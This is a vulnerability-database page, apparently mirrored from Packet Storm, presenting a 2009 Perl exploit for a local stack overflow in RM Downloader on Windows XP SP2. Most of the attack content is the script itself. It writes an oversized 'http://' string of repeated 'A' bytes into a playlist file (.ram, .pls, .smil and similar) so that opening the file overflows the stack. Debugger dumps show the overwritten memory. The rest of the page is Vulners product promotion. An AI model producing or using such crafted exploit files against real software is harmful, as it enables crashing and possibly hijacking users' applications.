Lucene search
K

RM Downloader Stack Overflow

🗓️ 25 Aug 2009 00:00:00Reported by the_Edit0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

RM Downloader has a local stack overflow vulnerability; tested on Windows XP Pro SP2.

Code
`#!/usr/bin/perl  
#[+] Bug : RM Downloader (.Ram/.Smi/ .pls/ .smil/ .wax/ .wpl File) Local Stack Overflow   
#[+] Author : the_Edit0r  
#[+] Greetz to all my friends  
#[+] Tested on: Windows XP Pro SP2   
#[+] Big thnx: Expl0iters.ir * Anti-security.ir  
########################################################################################  
# 0012F920 |00168370 ASCII "AAAA"  
# 0012F924 |41410004  
# 0012F928 |41414141  
# 0012F92C |41414141  
# 0012F930 |41414141  
# 0012F934 |41414141  
# 0012F938 |41414141  
# 0012F93C |41414141  
# 0012F940 |41414141  
# 0012F944 |41414141  
# 0012F948 |41414141  
########################################################################################  
my $crash="http://"."\x41\x41\x41\x41\x41\x41\x41\x41\x41" x 2901;  
open(myfile,'>>Edit0r.ggg'); #/smi , pls , smil , wax , wpl  
print myfile $crash;   
print "File Created successfully\n";  
########################################################################################`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation